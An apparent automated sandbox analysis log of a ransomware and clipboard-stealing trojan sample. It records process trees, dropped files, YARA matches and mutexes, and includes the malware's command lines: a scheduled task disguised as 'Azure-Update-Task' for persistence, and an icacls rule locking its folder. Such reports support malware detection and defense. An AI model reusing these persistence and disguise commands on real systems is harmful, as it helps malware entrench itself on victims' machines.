Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09

Source: C:\Windows\System32\wbem\WMIADAP.exe

File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: String function: 004065D4 appears 31 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: String function: 0042F7C0 appears 56 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: String function: 00428520 appears 57 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: String function: 004547A0 appears 31 times

Source: U59WtZz2Sg.exe	Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: build2[1].exe.5.dr	Static PE information: Resource name: RT_VERSION type: x86 executable not stripped

Source: U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsipc.dll.muiB vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.463172633.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDismHost.exej% vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.410994710.0000000003060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: System.OriginalFileName vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.409368444.0000000003060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: System.OriginalFileName vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe

Source: U59WtZz2Sg.exe

Static PE information: Section: .data ZLIB complexity 0.9938334668803419

Source: U59WtZz2Sg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@32/1330@8/5

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

1_2_00411900

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

0_2_00403341

Source: U59WtZz2Sg.exe

Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

File read: C:\Users\user\Desktop\U59WtZz2Sg.exe

Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: unknown	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

1_2_0040D240

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0218B7C6 CreateToolhelp32Snapshot,Module32First,

0_2_0218B7C6

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: F5(O	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: 9OE	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: #aN	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: #m2d	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: qQUQ	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: "wcL	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: 8d._	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: b.&F	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: I@KH	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: \@]K	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: >t9+	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: 3s	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: Tq.	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: G(p	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: B;S_	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: mr`7	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: R@	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: R@	0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Command line argument: lasisis	0_2_00403607

Source: U59WtZz2Sg.exe	String found in binary or memory: set-addPolicy
Source: U59WtZz2Sg.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: U59WtZz2Sg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\gahu\juviru.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dismhost.pdbGCTL source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dismhost.pdb source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0h source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: #C:\gahu\juviru.pdb0f source: U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_00406619 push ecx; ret	0_2_0040662C
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_0218E0AF push ecx; retf	0_2_0218E0B2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00428565 push ecx; ret	1_2_00428578

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0040322F LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_0040322F

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\VhdProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\MsiProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sv\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Latn-RS\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui	Jump to dropped file
